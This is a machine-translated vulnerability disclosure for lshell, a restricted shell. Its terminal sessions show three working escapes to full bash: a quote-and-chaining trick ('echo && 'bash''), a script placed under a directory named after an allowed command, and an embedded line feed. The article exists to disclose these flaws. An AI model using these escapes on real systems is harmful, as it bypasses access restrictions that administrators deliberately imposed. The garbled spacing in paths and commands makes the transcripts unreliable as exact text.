0day vulnerabilities in lshell

    lshell is a shell that restricts file system commands and paths that are accessible to the user. It is read as an alternative to the sophisticated chroot setup:

    and so on, there are many sources offering it for use.

    The application is available in the repositories of Ubuntu, Debian and EPEL.

    Code Issues

    A quick look at lshell notes on configuration files shows that some of the restrictions introduced by lshell are used to simplify parsing commands, and not to enhance security. For example - the prohibition of the use of semicolons and sub-shells. It makes sense to take a closer look at how this parsing is implemented.

    When examining the source code, it becomes clear that the selection of the launched command and its arguments is made by the library , which is intended for parsing simple CLI commands and does not parse correctly the complex syntax of shell commands. At the same time, despite the warning in the documentation , after a simple validation, the command is passed to the / bin / sh shell . Validation deserves special attention and is based on the assumption that:

    There is no real syntax analysis anywhere, so these are far from all the assumptions made in the verification.

    The consequences

    The following scenarios are available for escaping from such a limited shell.
    Scenario 1: exploiting a problem with quotation marks and command chains
    vladislav @ dt1: ~ $ getent passwd testuser
    testuser: x: 1002: 1003: ,,,: / home / testuser: / usr / bin / lshell
    vladislav @ dt1: ~ $ su - testuser
    Password: 
    You are in a limited shell.
    Type '?' or 'help' to get the list of allowed commands
    testuser: ~ $?
    cd clear echo exit help history ll lpath ls lsudo
    testuser: ~ $ ls
    examples.desktop
    testuser: ~ $ which bash
    *** forbidden command: which
    testuser: ~ $ ls'usb '
    Bus 002 Device 001: ID 1d6b: 0003 Linux Foundation 3.0 root hub
    Bus 001 Device 006: ID 046d: c05a Logitech, Inc. M90 / M100 Optical Mouse
    Bus 001 Device 002: ID 046d: c31c Logitech, Inc. Keyboard K120
    Bus 001 Device 001: ID 1d6b: 0002 Linux Foundation 2.0 root hub
    testuser: ~ $ echo && 'bash'
    testuser @ dt1: ~ $ PATH = / usr / local / sbin: / usr / local / bin: / usr / sbin: / usr / bin: / sbin: / bin: / usr / games: / usr / local / games: / snap / bin
    testuser @ dt1: ~ $ reboot --help
    reboot [OPTIONS ...] [ARG]
    Reboot the system.
         --help Show this help
         --halt Halt the machine
      -p --poweroff Switch off the machine
         --reboot Reboot the machine
      -f --force Force immediate halt / power-off / reboot
      -w --wtmp-only Don't halt / power-off / reboot, just write wtmp record
      -d --no-wtmp Don't write wtmp record
         --no-wall Don't send wall message before halt / power-off / reboot
    

    Gh issue

    Scenario 2: running a script from your home directory, the path to which contains the name of the allowed command
    vladislav @ dt1: ~ $ su - testuser
    Password: 
    You are in a limited shell.
    Type '?' or 'help' to get the list of allowed commands
    testuser: ~ $?
    cd clear echo exit help history ll lpath ls lsudo
    testuser: ~ $ echo '/ 1.sh'
    testuser @ dt1: ~ $ cat echo / 1.sh 
    #! / bin / bash
    / bin / bash
    testuser @ dt1: ~ $ 
    

    Gh issue

    Scenario 3: using custom terminal sequences
    It is enough to start the command with any allowed word, insert a line feed by successive pressing of two keyboard shortcuts and enter any desired command on a new line.

    vladislav @ dt1: ~ $ getent passwd testuser
    testuser: x: 1001: 1002: ,,,: / home / testuser: / usr / bin / lshell
    vladislav @ dt1: ~ $ su - testuser
    Password: 
    You are in a limited shell.
    Type '?' or 'help' to get the list of allowed commands
    testuser: ~ $?
    cd clear echo exit help history ll lpath ls lsudo
    testuser: ~ $ bash
    *** forbidden command: bash
    testuser: ~ $ echo
    bash
    testuser @ dt1: ~ $ which bash
    / bin / bash
    

    Gh issue

    The best decision

    This software solution is too far from a state in which it can be used safely. Therefore, the best way would be to stop its operation.

    Also popular now: